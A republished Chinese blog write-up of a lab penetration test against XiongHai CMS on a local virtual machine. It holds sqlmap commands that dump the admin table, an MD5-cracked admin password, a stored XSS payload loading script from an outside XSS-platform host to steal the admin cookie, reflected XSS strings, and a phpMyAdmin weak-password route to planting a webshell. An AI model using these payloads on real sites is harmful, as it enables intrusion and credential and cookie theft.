CMS-熊海网站内容管理系统漏洞测试

Posted joker-vip

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CMS-熊海网站内容管理系统漏洞测试相关的知识,希望对你有一定的参考价值。

开门见山

 


 

在虚拟机中搭建网站,本机访问http://192.168.31.68/

 技术图片

 

 

 


 

一、SQL注入获取管理员账号密码

 

1. 点开一篇文章,存在get请求参数

 技术图片

 

 

 

2. 手工注入无果,使用sqlmap,后跟-p接指定参数,验证是否存在sql注入

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid"

 技术图片

 

 

 技术图片

 

 

 

3. 爆数据库

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" --dbs

 技术图片

 

 

 技术图片

 

 

 技术图片

 

 

 

4. 爆表

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test --tables

技术图片

 

 

 技术图片

 

 

 技术图片

 

 

 

5. 爆字段

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test -T manage --columns

 技术图片

 

 

 技术图片

 

 

 技术图片

 

 

 

6. 爆值

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test -T manage -C user,password --dump

 技术图片

 

 

 技术图片

 

 

 

7. MD5解密63a9f0ea7bb98050796b649e85481845  为  root

得到管理员的账号密码 admin /root

可以进一步登进后台操作

 


 

二、存储型XSS获取管理员cookie

1. 在xss平台上配置监听端口

 技术图片

 

 

 技术图片

 

 

 

2. 复制代码,<sCRiPt sRC=http://xss.fbisb.com/tHbs></sCrIpT>

 技术图片

 

 

 

3. 在表单中插入xss脚本

 技术图片

 

 

 

4. 发表成功,等待管理员登录后台查看留言,

 技术图片

 

 

 技术图片

 

 

 

5. 监听段得到服务端反弹过来的信息,得到管理员的cookie

 技术图片

 

 

 

6. 找到网站后台,登录抓包

 技术图片

 

 

 

cookie替换陈管理员的cookie,并且记得要换上面的目标网址把login.php换成index.php,需要改多个包,发包进入后台

 技术图片

 

 

 


 

三、反弹型xss

http://192.168.31.68/?r=content&cid=5‘ <img src=1 onerror=alert(/xss/)>

技术图片

 

 

http://192.168.31.68/?r=list&class=3&page=1‘<img src=1 onerror=alert(/xss/)>

 技术图片

 

 


 

四、Phpmyadmin弱口令上传一句话

账号密码为root/root

进去执行SQL上传文件语句

phpinfo.php知道绝对路径

 技术图片

 

 技术图片

 

 

菜刀连接

 技术图片

 

 技术图片

 

 

 


 

以上是关于CMS-熊海网站内容管理系统漏洞测试的主要内容,如果未能解决你的问题,请参考以下文章

熊海cms-文件包含漏洞

代码审计 熊海cms V1.0

php代码审计熊海cms1.0

渗透测试-CMS网站数据库备份漏洞

开源PHP组件漏洞曝光,多个运行CMS系统的网站受影响

CMS网站漏洞检测对获取管理员密码漏洞如何修复